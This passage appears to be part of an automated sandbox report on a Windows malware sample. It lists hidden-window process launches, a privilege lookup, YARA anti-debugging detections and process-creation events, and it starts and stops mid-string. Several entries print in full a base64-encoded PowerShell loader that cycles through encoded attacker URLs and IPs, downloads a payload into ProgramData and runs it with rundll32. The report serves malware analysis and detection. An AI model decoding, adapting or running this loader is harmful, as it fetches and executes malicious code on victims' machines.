AHAAQQBHAFEAQQBaAFEAQQA9ACIAOwAkAGwAZQBlAHIAaQBuAGcAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBEAEUAQQBNAHcAQQB4AEEAQwA0AEEATQBRAEEAMQBBAEQAZwBBAEwAZwBBAHkAQQBEAEUAQQBOAFEAQQB1AEEARABjAEEATgBRAEEAPQBYAFIAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARABZAEEATgBnAEEAdQBBAEQARQBBAE4AQQBBADEAQQBDADQAQQBNAFEAQQAxAEEARABVAEEATABnAEEAeABBAEQAawBBAE0AdwBBAD0AWABSAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeABBAEQAZwBBAE0AUQBBAHUAQQBEAEUAQQBPAEEAQQA1AEEAQwA0AEEATQBRAEEAMgBBAEQAYwBBAEwAZwBBAHkAQQBEAEEAQQBPAEEAQQA9ACIAOwA="

A process created a hidden window (2 events)

Time & API	Arguments	Status	Return	Repeated
ShellExecuteExW May 23, 2023, 9:37 a.m.	show_type: 0 filepath_r: wscript parameters: "C:\ProgramData\submatrixPunditries.js" UnderfleeceDeathsman Dentale filepath: wscript	1	1	0
ShellExecuteExW May 23, 2023, 9:37 a.m.	show_type: 0 filepath_r: powershell parameters: -encodedcommand "JABtAG8AYQBiAGkAdABlACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB5AEEARABRAEEATQBRAEEAdQBBAEQARQBBAE0AQQBBAHgAQQBDADQAQQBNAFEAQQAwAEEARABjAEEATABnAEEAMABBAEQATQBBAE8AUQBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAE0AQQBOAGcAQQB1AEEARABJAEEATgBBAEEAeQBBAEMANABBAE0AUQBBADAAQQBEAFUAQQBMAGcAQQB5AEEARABFAEEATQBRAEEAPQAiADsAJABjAGgAbwBsAG8AaQBkAGkAbgBpAGMAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBADQAQQBEAFEAQQBMAGcAQQB4AEEARABnAEEATgBnAEEAdQBBAEQAWQBBAE0AZwBBAHUAQQBEAEkAQQBNAFEAQQA0AEEAQQA9AD0AZQBKAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEQASQBBAE0AQQBBADAAQQBDADQAQQBPAEEAQQB3AEEAQwA0AEEATQBRAEEAMgBBAEQAYwBBAEwAZwBBAHgAQQBEAGcAQQBOAGcAQQA9AGUASgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAFEAQQBOAEEAQQB1AEEARABJAEEATgBBAEEANQBBAEMANABBAE0AUQBBAHoAQQBEAFUAQQBMAGcAQQA1AEEARABVAEEAZQBKAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEQASQBBAE0AQQBBADUAQQBDADQAQQBPAEEAQQA0AEEAQwA0AEEATQBRAEEANABBAEQARQBBAEwAZwBBADMAQQBEAFUAQQAiADsAUwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAAMQAxADsAJABwAGUAYwBrAGUAcgBzACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARQBRAEEAYwBnAEIAaABBAEgAYwBBAFkAZwBCAGwAQQBHADQAQQBZAHcAQgBvAEEARQBZAEEAYwBnAEIAaABBAEgAawBBAGEAUQBCAHUAQQBHAGMAQQBMAGcAQgB0AEEASABVAEEARgA9AE0ARwBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBEAGcAQQBPAEEAQQB1AEEARABJAEEATQBBAEEAMgBBAEMANABBAE0AZwBBAHoAQQBEAFkAQQBMAGcAQQB5AEEARABNAEEATgBBAEEAPQBGAD0ATQBHAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEQARQBBAE4AdwBBADUAQQBDADQAQQBNAFEAQQAyAEEARABBAEEATABnAEEAeABBAEQAUQBBAE4AZwBBAHUAQQBEAEUAQQBNAHcAQQA1AEEAQQA9AD0AIgA7ACQAcgBvAG0AYQBuAGkAegBlAHIAQQBzAHAAcgBlAGQAaQBuAGkAZABhAGUAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBCAFEAQQBHAHcAQQBaAFEAQgAxAEEASABJAEEAYgB3AEIAMABBAEcAOABBAGIAUQBCADUAQQBGAFkAQQBkAFEAQgBzAEEARwBNAEEAWQBRAEIAdQBBAEcAawBBAGMAdwBCAGwAQQBHAFEAQQBMAGcAQgB1AEEARwB3AEEAIgA7ACQASQBuAGMAbwBtAGUAcgAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEUARQBBAFkAdwBCADAAQQBIAFUAQQBiAHcAQgB6AEEARwBVAEEATABnAEIAbABBAEcARQBBAGMAZwBCADAAQQBHAGcAQQBzAEUAYgBaAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEQASQBBAE0AUQBBAHcAQQBDADQAQQBNAGcAQQAwAEEARABnAEEATABnAEEANQBBAEQAZwBBAEwAZwBBADMAQQBEAEkAQQAiADsAJABoAGkAcABwAHUAcgBpAHMARQB4AGMAdQBzAGUAcgBzACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB4AEEARABjAEEATgBnAEEAdQBBAEQARQBBAE0AZwBBADAAQQBDADQAQQBNAFEAQQA1AEEARABnAEEATABnAEEAeQBBAEQARQBBAE0AZwBBAHYAQQBIAE0AQQBNAEEAQgBCAEEAQwA4AEEAUgBBAEIAMABBAEgATQBBAFYAQQBBADQAQQBIAGcAQQBkAEEAQQA9AGQAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB4AEEARABBAEEATwBRAEEAdQBBAEQARQBBAE4AdwBBAHkAQQBDADQAQQBOAEEAQQAxAEEAQwA0AEEATgB3AEEANQBBAEMAOABBAFUAQQBCAHMAQQBFAHcAQQBOAEEAQgB0AEEARgBVAEEATAB3AEEAdwBBAEUAMABBAFkAZwBBAHcAQQBGAGcAQQBkAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeABBAEQAYwBBAE4AZwBBAHUAQQBEAEUAQQBNAGcAQQAwAEEAQwA0AEEATQBRAEEANQBBAEQAZwBBAEwAZwBBAHkAQQBEAEUAQQBNAHcAQQB2AEEARQBZAEEAYwB3AEEANABBAEYAQQBBAGUAUQBBAHYAQQBGAEkAQQBaAFEAQgA1AEEARABBAEEAUgB3AEIAaABBAEYATQBBAFcAZwBBADIAQQBGAE0AQQBWAEEAQgB5AEEAQQA9AD0AIgA7AGYAbwByAGUAYQBjAGgAIAAoACQAaABhAGsAYQBmAG8AdABoAEwAbwBwAHAAZQByACAAaQBuACAAJABoAGkAcABwAHUAcgBpAHMARQB4AGMAdQBzAGUAcgBzACAALQBzAHAAbABpAHQAIAAiAGQAIgApACAAewAkAFAAbABhAG4AbwByAGIAbwBpAGQAUwB0AHIAeQBwAGUAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHkAQQBEAEUAQQBNAEEAQQB1AEEARABJAEEATQBBAEEAegBBAEMANABBAE0AUQBBADUAQQBEAFkAQQBMAGcAQQB4AEEARABFAEEATgBBAEEAPQBuAGoAbwBVAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEANQBBAEQAWQBBAEwAZwBBADQAQQBEAEEAQQBMAGcAQQB5AEEARABNAEEATQBRAEEAdQBBAEQARQBBAE0AZwBBAHcAQQBBAD0APQBuAGoAbwBVAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeABBAEQAQQBBAE0AUQBBAHUAQQBEAGMAQQBOAFEAQQB1AEEARABJAEEATQBnAEEAegBBAEMANABBAE0AUQBBADQAQQBEAEkAQQBuAGoAbwBVAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEQARQBBAE8AUQBBAHoAQQBDADQAQQBNAFEAQQAyAEEARABZAEEATABnAEEANQBBAEQAYwBBAEwAZwBBAHgAQQBEAEEAQQBOAGcAQQA9ACIAOwB0AHIAeQAgAHsAJABpAG4AYwBhAHIAYwBlAHIAYQB0AGUAcwAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeQBBAEQATQBBAE0AdwBBAHUAQQBEAEUAQQBNAFEAQQB6AEEAQwA0AEEATQBRAEEANABBAEQARQBBAEwAZwBBAHgAQQBEAEUAQQBOAFEAQQA9AHQAVwBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBEAEkAQQBNAGcAQQA0AEEAQwA0AEEATQBnAEEAdwBBAEQAUQBBAEwAZwBBADMAQQBEAGsAQQBMAGcAQQB4AEEARABRAEEATQBRAEEAPQAiADsAJABVAG4AZABpAHYAZQByAHQAaQBiAGwAeQBGAGkAYgByAG8AdgBhAHMAYwB1AGwAYQByACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB5AEEARABNAEEATQBnAEEAdQBBAEQARQBBAE8AQQBBADQAQQBDADQAQQBNAFEAQQB5AEEARABFAEEATABnAEEAeABBAEQAawBBAE4AdwBBAD0ARQB1AGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAMQBBAEQATQBBAEwAZwBBAHgAQQBEAFkAQQBPAEEAQQB1AEEARABrAEEATQBBAEEAdQBBAEQAVQBBAE8AQQBBAD0ARQB1AGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEIAdgBBAEgAWQBBAFoAUQBCAHkAQQBHAGsAQQBiAGcAQgB6AEEARwBrAEEAYwB3AEIAMABBAEcAVQBBAGIAZwBCAGoAQQBHAGsAQQBaAFEAQgB6AEEARQAwAEEAZABRAEIAeQBBAEgAQQBBAGEAQQBCADUAQQBHAGsAQQBiAGcAQgBuAEEAQwA0AEEAYgBBAEIAdgBBAEcARQBBAGIAZwBBAD0ARQB1AGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEQARQBBAE8AUQBBAHcAQQBDADQAQQBNAFEAQQAxAEEARABVAEEATABnAEEAMwBBAEQAYwBBAEwAZwBBADAAQQBEAFUAQQAiADsAJABDAHIAYQBjAGsAdQBwACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARgBBAEEAYQBRAEIAagBBAEcAcwBBAFoAUQBCADAAQQBIAE0AQQBRAFEAQgBpAEEARwBJAEEAYgB3AEIANgBBAEgAbwBBAGIAdwBBAHUAQQBIAGsAQQBiAHcAQgBuAEEARwBFAEEAaABhAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEcATQBBAGQAUQBCAHoAQQBIAEEAQQBhAFEAQgBrAEEAQwA0AEEAYwBBAEIAaABBAEgASQBBAGQAQQBCADUAQQBBAD0APQBoAGEAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQgBvAEEASABrAEEAYwBBAEIAdgBBAEgAUQBBAGMAZwBCAHYAQQBIAEEAQQBhAEEAQgBwAEEARwBNAEEATABnAEIAbgBBAEgASQBBAGIAdwBCADEAQQBIAEEAQQAiADsAJABQAGkAZQByAGkAZABHAGUAbgB1AGYAbABlAHgAaQBvAG4AIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBuAGkAYwBvAGQAZQAuAEcAZQB0AFMAdAByAGkAbgBnACgAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQAaABhAGsAYQBmAG8AdABoAEwAbwBwAHAAZQByACkAKQA7AHcAZwBlAHQAIAAkAFAAaQBlAHIAaQBkAEcAZQBuAHUAZgBsAGUAeABpAG8AbgAgAC0ATwAgACQAZQBuAHYAOgBQAHIAbwBnAHIAYQBtAEQAYQB0AGEAXABuAG8AbgBpAG4AdABlAGwAbABpAGcAZQBuAGMAZQAuAE4AbwBuAGEAYwBpAGQAOwAkAEUAcwBjAG8AcABlAHQAYQAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEIAdABBAEcAVQBBAGIAQQBCAGgAQQBHADQAQQBiAHcAQgB3AEEARwB3AEEAWQBRAEIAcgBBAEcAawBBAFkAUQBCAEUAQQBHAGsAQQBjAHcAQgBwAEEARwA0AEEAZABBAEIAbABBAEcAYwBBAGMAZwBCAGgAQQBIAFEAQQBhAFEAQgB2AEEARwA0AEEAYQBRAEIAegBBAEgAUQBBAEwAZwBCAGgAQQBHAGMAQQBaAFEAQgB1AEEARwBNAEEAZQBRAEEAPQA9AGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEUAZwBBAGEAUQBCAHkAQQBIAFUAQQBiAGcAQgBrAEEARwA4AEEAUQB3AEIAdgBBAEcAOABBAGMAQQBCAGwAQQBIAEkAQQBlAFEAQQB1AEEARwA0AEEAWQBRAEIAbgBBAEcAOABBAGUAUQBCAGgAQQBBAD0APQA9AGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEYATQBBAGQAUQBCAHcAQQBHAFUAQQBjAGcAQgBwAEEARwA0AEEAWgBBAEIAcABBAEgAWQBBAGEAUQBCAGsAQQBIAFUAQQBZAFEAQgBzAEEAQwA0AEEAYgBBAEIAcABBAEcAMABBAGIAdwBBAD0AIgA7ACQAUAByAG8AbABpAGYAZQByAGEAdABpAHYAZQBQAGEAcgBmAGUAeQAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEQARQBBAE4AUQBBADMAQQBDADQAQQBOAEEAQQB4AEEAQwA0AEEATgBBAEEAMwBBAEMANABBAE0AUQBBADIAQQBEAEkAQQBBAGoAdABmAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEQASQBBAE4AQQBBAHkAQQBDADQAQQBNAGcAQQB4AEEARABrAEEATABnAEEAeABBAEQAUQBBAE8AQQBBAHUAQQBEAEkAQQBOAEEAQQB4AEEAQQA9AD0AQQBqAHQAZgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHkAQQBEAEEAQQBNAEEAQQB1AEEARABFAEEATQBnAEEAeQBBAEMANABBAE4AZwBBADUAQQBDADQAQQBOAGcAQQAwAEEAQQA9AD0AQQBqAHQAZgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBCAG8AQQBIAFUAQQBjAHcAQgByAEEARwBrAEEAWgBRAEIAegBBAEUAVQBBAGUAUQBCAGwAQQBHAEkAQQBiAEEAQgBwAEEARwA0AEEAYQB3AEEAdQBBAEcAdwBBAGEAUQBBAD0AIgA7AGkAZgAgACgAKABHAGUAdAAtAEkAdABlAG0AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAUAByAG8AZwByAGEAbQBEAGEAdABhAFwAbgBvAG4AaQBuAHQAZQBsAGwAaQBnAGUAbgBjAGUALgBOAG8AbgBhAGMAaQBkACkALgBMAGUAbgBnAHQAaAAgAC0AZwBlACAAMgAyADIANQAzADMAKQB7AHAAbwB3AGUAcgBzAGgAZQBsAGwAIAAtAGUAbgBjAG8AZABlAGQAYwBvAG0AbQBhAG4AZAAgACIAYwB3AEIAMABBAEcARQBBAGMAZwBCADAAQQBDAEEAQQBjAGcAQgAxAEEARwA0AEEAWgBBAEIAcwBBAEcAdwBBAE0AdwBBAHkAQQBDAEEAQQBKAEEAQgBsAEEARwA0AEEAZABnAEEANgBBAEYAQQBBAGMAZwBCAHYAQQBHAGMAQQBjAGcAQgBoAEEARwAwAEEAUgBBAEIAaABBAEgAUQBBAFkAUQBCAGMAQQBHADQAQQBiAHcAQgB1AEEARwBrAEEAYgBnAEIAMABBAEcAVQBBAGIAQQBCAHMAQQBHAGsAQQBaAHcAQgBsAEEARwA0AEEAWQB3AEIAbABBAEMANABBAFQAZwBCAHYAQQBHADQAQQBZAFEAQgBqAEEARwBrAEEAWgBBAEEAcwBBAEgAWQBBAGEAUQBCAHcAQQBIAE0AQQBPAHcAQgB6AEEARwB3AEEAWQBRAEIAagBBAEcAcwBBAEwAZwBCAGoAQQBHADgAQQBiAFEAQQA9ACIAOwAkAG8AdQB0AGYAaQB0AHQAZQByAHMAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHkAQQBEAEEAQQBNAEEAQQB1AEEARABFAEEATgBBAEEANABBAEMANABBAE4AQQBBADQAQQBDADQAQQBPAFEAQQB3AEEAQQA9AD0AIgA7ACQAYwBhAG0AZQByAGEAbABpAHMAdABpAGMASAB5AGQAcgBvAGMAeQBhAG4AaQBkAGUAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAFEAQQBOAHcAQQB1AEEARABJAEEATQBnAEEAeABBAEMANABBAE0AUQBBADMAQQBEAE0AQQBMAGcAQQA0AEEARABZAEEAIgA7AGIAcgBlAGEAawA7AH0AfQAgAGMAYQB0AGMAaAAgAHsAJABjAHUAbgBjAHQAYQB0AGkAbwBuAEYAdQByAHIAaQBuAGcAcwAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeABBAEQATQBBAE4AQQBBAHUAQQBEAEkAQQBNAEEAQQA0AEEAQwA0AEEATQBRAEEAeABBAEQATQBBAEwAZwBBAHkAQQBEAEUAQQBNAEEAQQA9ACIAOwAkAE4AaQB0AHIAbwBwAGEAcgBhAGYAZgBpAG4AIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBGAFEAQQBZAFEAQgB6AEEASABRAEEAWgBRAEIAawBBAEMANABBAGIAUQBCAGgAQQBHADQAQQBZAFEAQgBuAEEARwBVAEEAYgBRAEIAbABBAEcANABBAGQAQQBBAD0AIgA7ACQAYQBuAHQAaQBjAGEAbgBjAGUAcgBvAHUAcwAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEQARQBBAE4AUQBBADEAQQBDADQAQQBNAFEAQQA1AEEARABBAEEATABnAEEANQBBAEQARQBBAEwAZwBBADUAQQBEAFEAQQB2AEIAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARwBjAEEAYgB3AEIAegBBAEcAMABBAGIAdwBCAHkAQQBHAFUAQQBMAGcAQgAzAEEARwBrAEEAWgBRAEIAdQBBAEEAPQA9AHYAQgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBFAHcAQQBhAFEAQgBuAEEASABVAEEAYgBBAEIAaABBAEgASQBBAEwAZwBCAGgAQQBIAEkAQQBZAHcAQgBvAEEARwBrAEEAdgBCAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEIAdgBBAEcASQBBAGQAQQBCADEAQQBIAE0AQQBhAFEAQgBtAEEARwA4AEEAYgBBAEIAcABBAEcAOABBAGQAUQBCAHoAQQBDADQAQQBZAGcAQgBwAEEARwBzAEEAWgBRAEEAPQAiADsAfQB9ACQAbwB4AGYAbwByAGQAaQBzAHQAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBHAFEAQQBhAFEAQgB6AEEASABBAEEAWgBRAEIAdQBBAEgATQBBAFkAUQBCADAAQQBHAGsAQQBiAHcAQgB1AEEARwBFAEEAYgBBAEEAdQBBAEcASQBBAGQAUQBCAHoAQQBHAGsAQQBiAGcAQgBsAEEASABNAEEAYwB3AEEAPQBrAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEgATQBBAGQAQQBCAHkAQQBIAFUAQQBiAFEAQgB3AEEARwBVAEEAZABBAEEAdQBBAEgAQQBBAFkAUQBCAHkAQQBIAFEAQQBlAFEAQQA9AGsAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQA0AEEARABRAEEATABnAEEAeABBAEQAVQBBAE0AQQBBAHUAQQBEAFEAQQBOAGcAQQB1AEEARABJAEEATQB3AEEAdwBBAEEAPQA9AGsAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQgBuAEEASABVAEEAWQBRAEIAdQBBAEgAawBBAGIAQQBCAEMAQQBHAHcAQQBiAHcAQgB2AEEARwBRAEEAZQBRAEEAdQBBAEcAYwBBAGQAUQBCAHAAQQBHAFEAQQBaAFEAQQA9ACIAOwAkAGwAZQBlAHIAaQBuAGcAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBEAEUAQQBNAHcAQQB4AEEAQwA0AEEATQBRAEEAMQBBAEQAZwBBAEwAZwBBAHkAQQBEAEUAQQBOAFEAQQB1AEEARABjAEEATgBRAEEAPQBYAFIAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARABZAEEATgBnAEEAdQBBAEQARQBBAE4AQQBBADEAQQBDADQAQQBNAFEAQQAxAEEARABVAEEATABnAEEAeABBAEQAawBBAE0AdwBBAD0AWABSAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeABBAEQAZwBBAE0AUQBBAHUAQQBEAEUAQQBPAEEAQQA1AEEAQwA0AEEATQBRAEEAMgBBAEQAYwBBAEwAZwBBAHkAQQBEAEEAQQBPAEEAQQA9ACIAOwA=" filepath: powershell	1	1	0

Checks for the Locally Unique Identifier on the system for a suspicious privilege (1 event)

Time & API	Arguments	Status	Return	Repeated
LookupPrivilegeValueW May 23, 2023, 9:37 a.m.	system_name: privilege_name: SeDebugPrivilege	1	1	0

Yara rule detected in process memory (16 events)

description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	Checks if being debugged	rule	anti_dbg
description	Bypass DEP	rule	disable_dep
description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	Checks if being debugged	rule	anti_dbg
description	Bypass DEP	rule	disable_dep

One or more non-whitelisted processes were created (4 events)

parent_process	wscript.exe	martian_process	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -encodedcommand "JABtAG8AYQBiAGkAdABlACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB5AEEARABRAEEATQBRAEEAdQBBAEQARQBBAE0AQQBBAHgAQQBDADQAQQBNAFEAQQAwAEEARABjAEEATABnAEEAMABBAEQATQBBAE8AUQBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAE0AQQBOAGcAQQB1AEEARABJAEEATgBBAEEAeQBBAEMANABBAE0AUQBBADAAQQBEAFUAQQBMAGcAQQB5AEEARABFAEEATQBRAEEAPQAiADsAJABjAGgAbwBsAG8AaQBkAGkAbgBpAGMAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBADQAQQBEAFEAQQBMAGcAQQB4AEEARABnAEEATgBnAEEAdQBBAEQAWQBBAE0AZwBBAHUAQQBEAEkAQQBNAFEAQQA0AEEAQQA9AD0AZQBKAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEQASQBBAE0AQQBBADAAQQBDADQAQQBPAEEAQQB3AEEAQwA0AEEATQBRAEEAMgBBAEQAYwBBAEwAZwBBAHgAQQBEAGcAQQBOAGcAQQA9AGUASgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAFEAQQBOAEEAQQB1AEEARABJAEEATgBBAEEANQBBAEMANABBAE0AUQBBAHoAQQBEAFUAQQBMAGcAQQA1AEEARABVAEEAZQBKAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEQASQBBAE0AQQBBADUAQQBDADQAQQBPAEEAQQA0AEEAQwA0AEEATQBRAEEANABBAEQARQBBAEwAZwBBADMAQQBEAFUAQQAiADsAUwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAAMQAxADsAJABwAGUAYwBrAGUAcgBzACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARQBRAEEAYwBnAEIAaABBAEgAYwBBAFkAZwBCAGwAQQBHADQAQQBZAHcAQgBvAEEARQBZAEEAYwBnAEIAaABBAEgAawBBAGEAUQBCAHUAQQBHAGMAQQBMAGcAQgB0AEEASABVAEEARgA9AE0ARwBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBEAGcAQQBPAEEAQQB1AEEARABJAEEATQBBAEEAMgBBAEMANABBAE0AZwBBAHoAQQBEAFkAQQBMAGcAQQB5AEEARABNAEEATgBBAEEAPQBGAD0ATQBHAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEQARQBBAE4AdwBBADUAQQBDADQAQQBNAFEAQQAyAEEARABBAEEATABnAEEAeABBAEQAUQBBAE4AZwBBAHUAQQBEAEUAQQBNAHcAQQA1AEEAQQA9AD0AIgA7ACQAcgBvAG0AYQBuAGkAegBlAHIAQQBzAHAAcgBlAGQAaQBuAGkAZABhAGUAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBCAFEAQQBHAHcAQQBaAFEAQgAxAEEASABJAEEAYgB3AEIAMABBAEcAOABBAGIAUQBCADUAQQBGAFkAQQBkAFEAQgBzAEEARwBNAEEAWQBRAEIAdQBBAEcAawBBAGMAdwBCAGwAQQBHAFEAQQBMAGcAQgB1AEEARwB3AEEAIgA7ACQASQBuAGMAbwBtAGUAcgAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEUARQBBAFkAdwBCADAAQQBIAFUAQQBiAHcAQgB6AEEARwBVAEEATABnAEIAbABBAEcARQBBAGMAZwBCADAAQQBHAGcAQQBzAEUAYgBaAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEQASQBBAE0AUQBBAHcAQQBDADQAQQBNAGcAQQAwAEEARABnAEEATABnAEEANQBBAEQAZwBBAEwAZwBBADMAQQBEAEkAQQAiADsAJABoAGkAcABwAHUAcgBpAHMARQB4AGMAdQBzAGUAcgBzACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB4AEEARABjAEEATgBnAEEAdQBBAEQARQBBAE0AZwBBADAAQQBDADQAQQBNAFEAQQA1AEEARABnAEEATABnAEEAeQBBAEQARQBBAE0AZwBBAHYAQQBIAE0AQQBNAEEAQgBCAEEAQwA4AEEAUgBBAEIAMABBAEgATQBBAFYAQQBBADQAQQBIAGcAQQBkAEEAQQA9AGQAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB4AEEARABBAEEATwBRAEEAdQBBAEQARQBBAE4AdwBBAHkAQQBDADQAQQBOAEEAQQAxAEEAQwA0AEEATgB3AEEANQBBAEMAOABBAFUAQQBCAHMAQQBFAHcAQQBOAEEAQgB0AEEARgBVAEEATAB3AEEAdwBBAEUAMABBAFkAZwBBAHcAQQBGAGcAQQBkAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeABBAEQAYwBBAE4AZwBBAHUAQQBEAEUAQQBNAGcAQQAwAEEAQwA0AEEATQBRAEEANQBBAEQAZwBBAEwAZwBBAHkAQQBEAEUAQQBNAHcAQQB2AEEARQBZAEEAYwB3AEEANABBAEY